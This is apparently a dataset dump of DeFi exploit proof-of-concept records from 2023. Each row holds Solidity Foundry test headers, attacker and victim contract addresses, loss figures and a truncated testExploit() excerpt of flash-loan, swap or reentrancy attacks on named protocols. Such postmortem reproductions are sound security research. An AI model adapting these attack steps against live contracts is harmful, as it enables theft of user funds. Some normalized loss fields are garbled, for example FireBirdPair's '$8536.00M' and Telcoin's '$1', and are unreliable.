// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : $3.3K // Attacker : https://bscscan.com/address/0x829fe73463ceae6579973b8bcd1e018976040ec4 // Attack Contract : https://bscscan.com/address/0xd7a7d90b63da1b4e7ef79cb36935d38af0d6d0b4 // Vulnerable Cont...
exploit_poc
MAMO
2023-12
MAMO_exp.sol
flash_loan
1f3408f89a5fb80f
2026-01-07T10:59:16.530654
postmortems
bsc
34,083,189
$3.3K
3,300
https://bscscan.com/address/0x829fe73463ceae6579973b8bcd1e018976040ec4
https://bscscan.com/address/0xd7a7d90b63da1b4e7ef79cb36935d38af0d6d0b4
https://bscscan.com/address/0x5813d7818c9d8f29a9a96b00031ef576e892def4
https://bscscan.com/tx/0x189a8dc1e0fea34fd7f5fa78c6e9bdf099a8d575ff5c557fa30d90c6acd0b29f
null
null
true
true
true
low
$3.3K
flash-loan
false
$3.3K
https://bscscan.com/address/0x829fe73463ceae6579973b8bcd1e018976040ec4
https://bscscan.com/address/0xd7a7d90b63da1b4e7ef79cb36935d38af0d6d0b4
https://bscscan.com/address/0x5813d7818c9d8f29a9a96b00031ef576e892def4
https://bscscan.com/tx/0x189a8dc1e0fea34fd7f5fa78c6e9bdf099a8d575ff5c557fa30d90c6acd0b29f
$3.3K
6.67
medium
MAMO Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~90K (info from hacked.slowmist.io) // Attacker : https://etherscan.io/address/0x05324c970713450ba0bc12efd840034fcb0a4baa // Attacker Contract : https://etherscan.io/add...
exploit_poc
PineProtocol
2023-12
PineProtocol_exp.sol
flash_loan
a212c9077f31794f
2026-01-07T10:59:16.530700
postmortems
ethereum
18,835,344
~90K (info from hacked.slowmist.io)
90,000
https://etherscan.io/address/0x05324c970713450ba0bc12efd840034fcb0a4baa
null
null
https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d
null
null
true
true
true
medium
~90K (info from hacked.slowmist.io)
flash-loan
function testExploit() public { emit log_named_decimal_uint( "[Before loan repay] Vault WETH balance after borrowing ~4 WETH to exploiter", WETH.balanceOf(pineGnosisSafe), 18 ); emit log_named_address( "[Before loan repay] Owner of PPG NFT id 3_324...
true
~90K (info from hacked.slowmist.io)
https://etherscan.io/address/0x05324c970713450ba0bc12efd840034fcb0a4baa
https://explorer.phalcon.xyz/tx/eth/0xec7523660f8b66d9e4a5931d97ad8b30acc679c973b20038ba4c15d4336b393d
$90.0K
8.82
high
PineProtocol Exploit (2023-12)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$769K // Attacker : https://bscscan.com/address/0xce27b195fa6de27081a86b98b64f77f5fb328dd5 // Attack Contract : https://bscscan.com/address/0xe1997bc971d5986aa57ee8ffb5...
exploit_poc
BEARNDAO
2023-12
BEARNDAO_exp.sol
flash_loan
0175c586f8681167
2026-01-07T10:59:16.530754
postmortems
bsc
34,099,688
~$769K
769,000
https://bscscan.com/address/0xce27b195fa6de27081a86b98b64f77f5fb328dd5
https://bscscan.com/address/0xe1997bc971d5986aa57ee8ffb57eb1deba4fdaaa
null
https://explorer.phalcon.xyz/tx/bsc/0x51913be3f31d5ddbfc77da789e5f9653ed6b219a52772309802226445a1edd5f
null
null
true
true
true
high
~$769K
flash-loan
function testExploit() public { deal(address(WBNB), address(this), 0); deal(address(BUSD), address(this), 0); emit log_named_decimal_uint( "Exploiter amount of BUSD before attack", BUSD.balanceOf(address(this)), BUSD.decimals() ); CAKE_WBNB.swap(0, 10_000 * 1e18, add...
true
~$769K
https://bscscan.com/address/0xce27b195fa6de27081a86b98b64f77f5fb328dd5
https://bscscan.com/address/0xe1997bc971d5986aa57ee8ffb57eb1deba4fdaaa
https://explorer.phalcon.xyz/tx/bsc/0x51913be3f31d5ddbfc77da789e5f9653ed6b219a52772309802226445a1edd5f
$769.0K
8.21
high
BEARNDAO Exploit (2023-12)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~2.4 $WBNB // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f // Vulnerable Contract : https://bscscan...
exploit_poc
HNet
2023-12
HNet_exp.sol
flash_loan
4467e99274626bc2
2026-01-07T10:59:16.530802
postmortems
bsc
34,141,220
~2.4 $WBNB
2.4
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f
https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90
https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8
null
null
true
false
true
low
~2.4 $WBNB
flash-loan
function testExploit() public { emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this))); HNet.approve(address(Router), type(uint256).max); WBNB.approve(address(Router), type(uint256).max); DODO.flashLoan(0.1 * 1e18, 0, address(this), new bytes(1)); ...
true
~2.4 $WBNB
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xaed80b8a821607981e5e58b7a753a3336c0bfd6f
https://bscscan.com/address/0x0dabdc92af35615443412a336344c591faed3f90
https://app.blocksec.com/explorer/tx/bsc/0x1ee617cd739b1afcc673a180e60b9a32ad3ba856226a68e8748d58fcccc877a8
$2
9.38
high
HNet Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer) // Exploiter : https://etherscan.io/address/0x6738fa889ff31f82d9fe8862ec025dbe318f3fde // At...
exploit_poc
GoodDollar
2023-12
GoodDollar_exp.sol
flash_loan
2ddcd07ca2e68e35
2026-01-07T10:59:16.530855
postmortems
ethereum
18,802,014
~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer)
2,000,000
null
https://etherscan.io/address/0xf06ab383528f51da67e2b2407327731770156ed6
null
https://app.blocksec.com/explorer/tx/eth/0x726459a46839c915ee2fb3d8de7f986e3c7391c605b7a622112161a84c7384d0
null
null
true
true
true
critical
~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer)
flash-loan
function testExploit() public { deal(address(this), 0); emit log_named_decimal_uint("Exploiter DAI balance before attack", DAI.balanceOf(address(this)), DAI.decimals()); emit log_named_decimal_uint( "Exploiter GoodDollarToken balance before attack", GoodDollarToken.balan...
true
~$2M (DAI + GoodDollarToken. Info from 'balance changes' in Blocksec Explorer)
https://etherscan.io/address/0xf06ab383528f51da67e2b2407327731770156ed6
https://app.blocksec.com/explorer/tx/eth/0x726459a46839c915ee2fb3d8de7f986e3c7391c605b7a622112161a84c7384d0
$2.00M
9
high
GoodDollar Exploit (2023-12)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~3200 $BUSD // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0xb2f22296661ccc5530ebdbabb8264b82e977504d // Vulnerable Contract : https://bscsca...
exploit_poc
CCV
2023-12
CCV_exp.sol
flash_loan
eb8247196bef82b0
2026-01-07T10:59:16.530915
postmortems
bsc
34,739,874
~3200 $BUSD
3,200
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xb2f22296661ccc5530ebdbabb8264b82e977504d
https://bscscan.com/address/0x37177ccc66ef919894cef37596bbebd76e7a40b2
https://bscscan.com/tx/0x6ba4152db9da45f5751f2c083bf77d4b3385373d5660c51fe2e4382718afd9b4
null
null
true
false
true
low
~3200 $BUSD
flash-loan
function testExploit() public { BUSD.transfer(address(0x000000000000000000000000000000000000dEaD), BUSD.balanceOf(address(this))); emit log_named_uint("Attacker BUSD balance before attack:", BUSD.balanceOf(address(this))); CCV.approve(address(Router), type(uint256).max); BUSD.approve(add...
true
~3200 $BUSD
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0xb2f22296661ccc5530ebdbabb8264b82e977504d
https://bscscan.com/address/0x37177ccc66ef919894cef37596bbebd76e7a40b2
https://bscscan.com/tx/0x6ba4152db9da45f5751f2c083bf77d4b3385373d5660c51fe2e4382718afd9b4
$3.2K
8.66
high
CCV Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "./../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$2.3K // Attacker : https://bscscan.com/address/0x90c4c1aa895a086215765ec9639431309633b198 // Attack Contract : https://bscscan.com/address/0xc25979956d6f6acfc3702c68dff...
exploit_poc
KEST
2023-12
KEST_exp.sol
flash_loan
e3109927ba4e1f3e
2026-01-07T10:59:16.530960
postmortems
bsc
null
~$2.3K
2,300
https://bscscan.com/address/0x90c4c1aa895a086215765ec9639431309633b198
https://bscscan.com/address/0xc25979956d6f6acfc3702c68dff7a4d871eee4aa
https://bscscan.com/address/0x7dda132dd57b773a94e27c5caa97834a73510429
https://app.blocksec.com/explorer/tx/bsc/0x2fcee04e64e54f3dd9c15db9ae44e4cbdd57ab4c6f01941a3acf470dc60bfc16
null
https://x.com/MetaSec_xyz/status/1736077719849623718
true
true
true
low
~$2.3K
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals() ); address[] memory assets = new address[](1); assets[0] = address(WBNB); uint256[] memory amounts = new uint256[](1); ...
true
~$2.3K
https://bscscan.com/address/0x90c4c1aa895a086215765ec9639431309633b198
https://bscscan.com/address/0xc25979956d6f6acfc3702c68dff7a4d871eee4aa
https://bscscan.com/address/0x7dda132dd57b773a94e27c5caa97834a73510429
https://app.blocksec.com/explorer/tx/bsc/0x2fcee04e64e54f3dd9c15db9ae44e4cbdd57ab4c6f01941a3acf470dc60bfc16
https://x.com/MetaSec_xyz/status/1736077719849623718
$2.3K
9.64
high
KEST Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~320K // Attacker : https://bscscan.com/address/0x20395d8e8a11cfd2541b942afdb810b7dcc64681 // Attack Contract : https://bscscan.com/address/0x07e536f23a197f6fb76f42ad01ac2...
exploit_poc
ChannelsFinance
2023-12
ChannelsFinance_exp.sol
null
e7278b2e6dd9b711
2026-01-07T10:59:16.531044
postmortems
bsc
34,806,205
~320K
320,000
https://bscscan.com/address/0x20395d8e8a11cfd2541b942afdb810b7dcc64681
https://bscscan.com/address/0x07e536f23a197f6fb76f42ad01ac2bcdc3bf738e
https://bscscan.com/address/0x93790c641d029d1cbd779d87b88f67704b6a8f4c
https://app.blocksec.com/explorer/tx/bsc/0x711cc4ceb9701d317fe9aa47187425e16dae7d5a0113f1430e891018262f8fb5
null
null
true
true
false
high
~320K
unknown
function testExploit() public { // Starting balances. Exploiter transferred amounts of tokens to attack contract before first attack tx // Transfer txs: // PancakeSwap Token: https://app.blocksec.com/explorer/tx/bsc/0x0237855c63eb85c5f437fba5267cc869a08c58a49501e3e5ebec9990bdd97565 deal(...
true
~320K
https://bscscan.com/address/0x20395d8e8a11cfd2541b942afdb810b7dcc64681
https://bscscan.com/address/0x07e536f23a197f6fb76f42ad01ac2bcdc3bf738e
https://bscscan.com/address/0x93790c641d029d1cbd779d87b88f67704b6a8f4c
https://app.blocksec.com/explorer/tx/bsc/0x711cc4ceb9701d317fe9aa47187425e16dae7d5a0113f1430e891018262f8fb5
$320.0K
9
high
ChannelsFinance Exploit (2023-12)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Attack tx: https://explorer.phalcon.xyz/tx/bsc/0x93ae5f0a121d5e1aadae052c36bc5ecf2d406d35222f4c6a5d63fef1d6de1081 Tweet alert: https://twitter.com/Phalcon_xyz/status/1737355152779030570...
exploit_poc
TransitFinance
2023-12
TransitFinance_exp.sol
null
771f63c12275c3a3
2026-01-07T10:59:16.531118
postmortems
unknown
34,506,417
null
null
null
null
null
https://explorer.phalcon.xyz/tx/bsc/0x93ae5f0a121d5e1aadae052c36bc5ecf2d406d35222f4c6a5d63fef1d6de1081
null
null
false
false
false
medium
null
unknown
function testExploit() public { emit log_named_decimal_uint("Balance BNB before attack", address(this).balance, 18); emit log_named_decimal_uint("Balance USD of router", IERC20(usd).balanceOf(router), 18); uint256[] memory pools = new uint256[](2); pools[0] = uint256(uint160(address(this...
true
Unknown
4.82
low
TransitFinance Exploit (2023-12)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~1,24M // Attacker : https://polygonscan.com/address/0xdb4b84f0e601e40a02b54497f26e03ef33f3a5b7 // Vulnerable Contract : https://polygonscan.com/address/0x56bcadff30680e...
exploit_poc
Telcoin
2023-12
Telcoin_exp.sol
null
c95e98acf90a1121
2026-01-07T10:59:16.531177
postmortems
polygon
51,546,495
~1,24M
1
https://polygonscan.com/address/0xdb4b84f0e601e40a02b54497f26e03ef33f3a5b7
null
https://polygonscan.com/address/0x56bcadff30680ebb540a84d75c182a5dc61981c0
null
null
null
true
true
false
low
~1,24M
unknown
function testExploit() public { emit log_named_decimal_uint("Attacker TEL balance before exploit", TEL.balanceOf(address(this)), TEL.decimals()); bytes32 cloneableProxyPackedSlot0 = vm.load(address(CloneableProxy), bytes32(uint256(0))); console.log("----------------------------------------------...
true
~1,24M
https://polygonscan.com/address/0xdb4b84f0e601e40a02b54497f26e03ef33f3a5b7
https://polygonscan.com/address/0x56bcadff30680ebb540a84d75c182a5dc61981c0
$1
7.02
medium
Telcoin Exploit (2023-12)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~40 eth // Attacker : https://etherscan.io/address/0x4453aed57c23a50d887a42ad0cd14ff1b819c750 // Attack Contract : https://etherscan.io/address/0x6ce5a85cff4c70591da82d...
exploit_poc
FloorDAO
2023-09
FloorDAO_exp.sol
null
2114ffc6c03449fb
2026-01-07T10:59:16.531231
postmortems
ethereum
18,068,772
~40 eth
40
https://etherscan.io/address/0x4453aed57c23a50d887a42ad0cd14ff1b819c750
https://etherscan.io/address/0x6ce5a85cff4c70591da82de5eb91c3fa38b40595
null
null
null
null
true
true
false
low
~40 eth
unknown
function testExploit() public { flashAmount = floor.balanceOf(address(floorUniPool)) - 1; floorUniPool.flash(address(this), 0, flashAmount, ""); uint256 profitAmount = floor.balanceOf(address(this)); emit log_named_decimal_uint("floor token balance after exploit", profitAmount, floor.de...
true
https://etherscan.io/address/0x4453aed57c23a50d887a42ad0cd14ff1b819c750
https://etherscan.io/address/0x6ce5a85cff4c70591da82de5eb91c3fa38b40595
$40
5.78
medium
FloorDAO Exploit (2023-09)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 1 NFT (ID: 4689) // Attacker : https://etherscan.io/address/0x92cfcb70b2591ceb1e3c6d90e21e8154e7d29832 // Attacker Contract : https://etherscan.io/address/0x9d9820f10772...
exploit_poc
uniclyNFT
2023-09
uniclyNFT_exp.sol
reentrancy
88490b04eac27cae
2026-01-07T10:59:16.531285
postmortems
ethereum
18,133,171
1 NFT (ID: 4689)
1
https://etherscan.io/address/0x92cfcb70b2591ceb1e3c6d90e21e8154e7d29832
null
https://etherscan.io/address/0xd3c41c85be295607e8ea5c58487ec5894300ee67
https://etherscan.io/tx/0xc42fe1ce2516e125a386d198703b2422aa0190b25ef6a7b0a1d3c6f5d199ffad
null
null
true
true
true
low
1 NFT (ID: 4689)
reentrancy
function testExploit() public { // Start with the below amount of WETH deal(address(WETH), address(this), 500e15); // Preparation phase uJENNY.approve(address(PointFarm), type(uint256).max); WETHToUJENNY(); uint256 amtuJENNY = uJENNY.balanceOf(address(this)); Poin...
true
1 NFT (ID: 4689)
https://etherscan.io/address/0x92cfcb70b2591ceb1e3c6d90e21e8154e7d29832
https://etherscan.io/address/0xd3c41c85be295607e8ea5c58487ec5894300ee67
https://etherscan.io/tx/0xc42fe1ce2516e125a386d198703b2422aa0190b25ef6a7b0a1d3c6f5d199ffad
$1
9.5
high
uniclyNFT Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~30K USD$ // Attacker : https://etherscan.io/address/0x060c169c4517d52c4be9a1dd53e41a3328d16f04 // Attack Contract : https://etherscan.io/address/0x8c425ee62d18b65cc9757...
exploit_poc
CEXISWAP
2023-09
CEXISWAP_exp.sol
null
0c40609c0bd05403
2026-01-07T10:59:16.531342
postmortems
ethereum
18,182,605
~30K USD$
30,000
https://etherscan.io/address/0x060c169c4517d52c4be9a1dd53e41a3328d16f04
https://etherscan.io/address/0x8c425ee62d18b65cc975767c27c42de548d133a1
https://etherscan.io/address/0xb8a5890d53df78dee6182a6c0968696e827e3305
https://etherscan.io/tx/0xede72a74d8398875b42d92c550539d72c830d3c3271a7641ee1843dc105de59e
null
null
true
true
false
medium
~30K USD$
unknown
function testExploit() public { exploiter = new Exploiter(); exploiter.exploit(); emit log_named_decimal_uint("Attacker USDT balance after exploit", USDT.balanceOf(address(this)), 6); } } contract Exploiter { ICEXISWAP private constant CEXISWAP = ICEXISWAP(0xB8a5890D53dF78dEE6182A6C0968...
true
~30K USD$
https://etherscan.io/address/0x060c169c4517d52c4be9a1dd53e41a3328d16f04
https://etherscan.io/address/0x8c425ee62d18b65cc975767c27c42de548d133a1
https://etherscan.io/address/0xb8a5890d53df78dee6182a6c0968696e827e3305
https://etherscan.io/tx/0xede72a74d8398875b42d92c550539d72c830d3c3271a7641ee1843dc105de59e
$30.0K
7.3
medium
CEXISWAP Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$38K // Attacker : https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891 // Attacker Contract : https://bscscan.com/address/0x9180981034364f683ea25bcce...
exploit_poc
BFCToken
2023-09
BFCToken_exp.sol
null
d8fcf02c8898d946
2026-01-07T10:59:16.531393
postmortems
bsc
31,599,443
~$38K
38,000
https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891
null
https://bscscan.com/address/0x595eac4a0ce9b7175a99094680fbe55a774b5464
https://bscscan.com/tx/0x8ee76291c1b46d267431d2a528fa7f3ea7035629500bba4f87a69b88fcaf6e23
null
null
true
true
false
medium
~$38K
unknown
function testExploit() public { deal(address(BUSDT), address(this), 0); deal(address(this), 0); bytes memory swapData = abi.encode(address(BFC), address(BUSDT_BFC), 400_000 * 1e18); BUSDT_WBNB.swap(400_000 * 1e18, 0, address(this), swapData); swapBUSDTToBNB(); emit log_n...
true
~$38K
https://bscscan.com/address/0x7cb74265e3e2d2b707122bf45aea66137c6c8891
https://bscscan.com/address/0x595eac4a0ce9b7175a99094680fbe55a774b5464
https://bscscan.com/tx/0x8ee76291c1b46d267431d2a528fa7f3ea7035629500bba4f87a69b88fcaf6e23
$38.0K
8.06
high
BFCToken Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$61K // Attacker : https://etherscan.io/address/0xcf28e9b8aa557616bc24cc9557ffa7fa2c013d53 // Attacker Contract : https://etherscan.io/address/0xc44ea7650b27f83a6b310a8...
exploit_poc
0x0DEX
2023-09
0x0DEX_exp.sol
flash_loan
575c03a8df0ad9eb
2026-01-07T10:59:16.531448
postmortems
ethereum
18,115,707
~$61K
61,000
https://etherscan.io/address/0xcf28e9b8aa557616bc24cc9557ffa7fa2c013d53
null
https://etherscan.io/address/0x29d2bcf0d70f95ce16697e645e2b76d218d66109
https://explorer.phalcon.xyz/tx/eth/0x00b375f8e90fc54c1345b33c686977ebec26877e2c8cac165429927a6c9bdbec
null
null
true
true
true
medium
~$61K
flash-loan
function testExploit() public { deal(address(this), 0 ether); uint256 loan = 11 ether; address[] memory tokens = new address[](1); tokens[0] = address(WETH); uint256[] memory amounts = new uint256[](1); amounts[0] = loan; BalancerVault.flashLoan(address(this), t...
true
~$61K
https://etherscan.io/address/0xcf28e9b8aa557616bc24cc9557ffa7fa2c013d53
https://etherscan.io/address/0x29d2bcf0d70f95ce16697e645e2b76d218d66109
https://explorer.phalcon.xyz/tx/eth/0x00b375f8e90fc54c1345b33c686977ebec26877e2c8cac165429927a6c9bdbec
$61.0K
10
high
0x0DEX Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~$2.4ETH // Attacker : https://etherscan.io/address/0x6CE9fa08F139F5e48bc607845E57efE9AA34C9F6 // Attack Contract : https://etherscan.io/address/0x154863eb71De4a34F88Ea...
exploit_poc
JumpFarm
2023-09
JumpFarm_exp.sol
flash_loan
ae87223516292c08
2026-01-07T10:59:16.531518
postmortems
ethereum
18,070,346
~$2.4ETH
2.4
https://etherscan.io/address/0x6CE9fa08F139F5e48bc607845E57efE9AA34C9F6
https://etherscan.io/address/0x154863eb71De4a34F88Ea57450840eAB1c71abA6
null
null
null
null
true
true
true
low
~$2.4ETH
flash-loan
function testExploit() public { address[] memory token = new address[](1); token[0] = address(weth); uint256[] memory amount = new uint256[](1); amount[0] = 15 * 1 ether; balancer.flashLoan(address(this), token, amount, hex"28"); // weth.withdraw(weth.balanceOf(address(t...
true
https://etherscan.io/address/0x6CE9fa08F139F5e48bc607845E57efE9AA34C9F6
https://etherscan.io/address/0x154863eb71De4a34F88Ea57450840eAB1c71abA6
$2
6.71
medium
JumpFarm Exploit (2023-09)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~78K USD$ // Attacker : https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e // Attack Contract : https://bscscan.com/address/0xa7fe9c5d4b87b0d03e9bb99...
exploit_poc
Kub_Split
2023-09
Kub_Split_exp.sol
flash_loan
14c4f3f723bbbcb2
2026-01-07T10:59:16.531570
postmortems
bsc
32,021,100
~78K USD$
78,000
https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e
https://bscscan.com/address/0xa7fe9c5d4b87b0d03e9bb99f4b4e76785de26b5d
https://bscscan.com/address/0xc98e183d2e975f0567115cb13af893f0e3c0d0bd
https://bscscan.com/tx/0x2b0877b5495065e90d956e44ffde6aaee5e0fcf99dd3c86f5ff53e33774ea52d
null
null
true
true
true
medium
~78K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); deal(address(fakeUSDC), address(this), 10_000 * 1e18); emit log_named_decimal_uint( "Attacker BUSDT balance before attack", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); emit log_named_dec...
true
~78K USD$
https://bscscan.com/address/0x7ccf451d3c48c8bb747f42f29a0cde4209ff863e
https://bscscan.com/address/0xa7fe9c5d4b87b0d03e9bb99f4b4e76785de26b5d
https://bscscan.com/address/0xc98e183d2e975f0567115cb13af893f0e3c0d0bd
https://bscscan.com/tx/0x2b0877b5495065e90d956e44ffde6aaee5e0fcf99dd3c86f5ff53e33774ea52d
$78.0K
10
high
Kub_Split Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$16K // Attacker : https://etherscan.io/address/0x7d9bc45a9abda926a7ce63f78759dbfa9ed72e26 // Attack Contract : https://etherscan.io/address/0xe897c0f9443785f8d4f0fa6e9...
exploit_poc
DAppSocial
2023-09
DAppSocial_exp.sol
null
37b936e6a043cb5f
2026-01-07T10:59:16.531651
postmortems
ethereum
18,048,982
~$16K
16,000
https://etherscan.io/address/0x7d9bc45a9abda926a7ce63f78759dbfa9ed72e26
https://etherscan.io/address/0xe897c0f9443785f8d4f0fa6e92a81066b3fbfee2
https://etherscan.io/address/0x319ec3ad98cf8b12a8be5719fec6e0a9bb1ad0d1
https://etherscan.io/tx/0xbd72bccec6dd824f8cac5d9a3a2364794c9272d7f7348d074b580e3c6e44312e
null
null
true
true
false
medium
~$16K
unknown
function testExploit() public { deal(address(USDT), address(this), 5e6); deal(address(USDC), address(this), 5e6); helperExploitContract = new HelperExploitContract(); USDT.approve(address(DAppSocial), 2e6); USDC.approve(address(DAppSocial), 2e6); emit log_named_decimal_u...
true
~$16K
https://etherscan.io/address/0x7d9bc45a9abda926a7ce63f78759dbfa9ed72e26
https://etherscan.io/address/0xe897c0f9443785f8d4f0fa6e92a81066b3fbfee2
https://etherscan.io/address/0x319ec3ad98cf8b12a8be5719fec6e0a9bb1ad0d1
https://etherscan.io/tx/0xbd72bccec6dd824f8cac5d9a3a2364794c9272d7f7348d074b580e3c6e44312e
$16.0K
8.11
high
DAppSocial Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~4K USD$ // Attacker : https://bscscan.com/address/0x09039e2082a0a815908e68bd52b86f96573768e8 // Attack Contract : https://bscscan.com/address/0x0f41f9146de354e5ac6bb399...
exploit_poc
DEXRouter
2023-09
DEXRouter_exp.sol
null
5ab908f0cf524f36
2026-01-07T10:59:16.531702
postmortems
bsc
32,161,325
~4K USD$
4,000
https://bscscan.com/address/0x09039e2082a0a815908e68bd52b86f96573768e8
https://bscscan.com/address/0x0f41f9146de354e5ac6bb3996e2e319dc8a3bb7f
null
https://bscscan.com/tx/0xf77c5904da98d3d4a6e651d0846d35545ef5ca0b969132ae81a9c63e1efc2113
null
null
true
true
false
low
~4K USD$
unknown
function testExploit() public { deal(address(this), 0 ether); emit log_named_decimal_uint("Attacker BNB balance before exploit", address(this).balance, 18); // DEXRouter will call back to function with selector "0xe44a73b7". Look at fallback function DEXRouter.update(address(this), addre...
true
~4K USD$
https://bscscan.com/address/0x09039e2082a0a815908e68bd52b86f96573768e8
https://bscscan.com/address/0x0f41f9146de354e5ac6bb3996e2e319dc8a3bb7f
https://bscscan.com/tx/0xf77c5904da98d3d4a6e651d0846d35545ef5ca0b969132ae81a9c63e1efc2113
$4.0K
6.11
medium
DEXRouter Exploit (2023-09)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~8536 MATIC (This tx exploit 3211 MATIC) // Attacker : https://polygonscan.com/address/0x8e83cd1bad00cf933b86214aaaab4db56abf68aa // Attack Contract : https://polygonsca...
exploit_poc
FireBirdPair
2023-09
FireBirdPair_exp.sol
flash_loan
aaab22a5f0c7431d
2026-01-07T10:59:16.531746
postmortems
polygon
48,149,138
~8536 MATIC (This tx exploit 3211 MATIC)
8,536,000,000
https://polygonscan.com/address/0x8e83cd1bad00cf933b86214aaaab4db56abf68aa
https://polygonscan.com/address/0x22b1a115b16395e5ebd50f4f82aef3a159e1c6d1
https://polygonscan.com/address/0x5e9cd0861f927adeccfeb2c0124879b277dd66ac
https://polygonscan.com/tx/0x96d80c609f7a39b45f2bb581c6ba23402c20c2b6cd528317692c31b8d3948328
null
null
true
false
true
critical
~8536 MATIC (This tx exploit 3211 MATIC)
flash-loan
false
~8536 MATIC (This tx exploit 3211 MATIC)
https://polygonscan.com/address/0x8e83cd1bad00cf933b86214aaaab4db56abf68aa
https://polygonscan.com/address/0x22b1a115b16395e5ebd50f4f82aef3a159e1c6d1
https://polygonscan.com/address/0x5e9cd0861f927adeccfeb2c0124879b277dd66ac
https://polygonscan.com/tx/0x96d80c609f7a39b45f2bb581c6ba23402c20c2b6cd528317692c31b8d3948328
$8536.00M
8
high
FireBirdPair Exploit (2023-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 59.5 ETH and ~72.1k USDT (~$169k) // Attacker : https://bscscan.com/address/0x73d80500b30a6ca840bfab0234409d98cf588089 // Attack Contract : https://bscscan.com/address/0...
exploit_poc
APIG
2023-09
APIG_exp.sol
null
5ddad8af77415dce
2026-01-07T10:59:16.531813
postmortems
bsc
31,562,012
59.5 ETH and ~72.1k USDT (~$169k)
59.5
https://bscscan.com/address/0x73d80500b30a6ca840bfab0234409d98cf588089
https://bscscan.com/address/0xfdc6a621861ed2a846ab475c623e13764f6a5ad0
null
